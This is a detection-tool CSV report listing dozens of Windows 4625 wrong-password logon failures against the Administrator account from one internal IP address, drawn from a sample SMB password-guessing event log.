2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
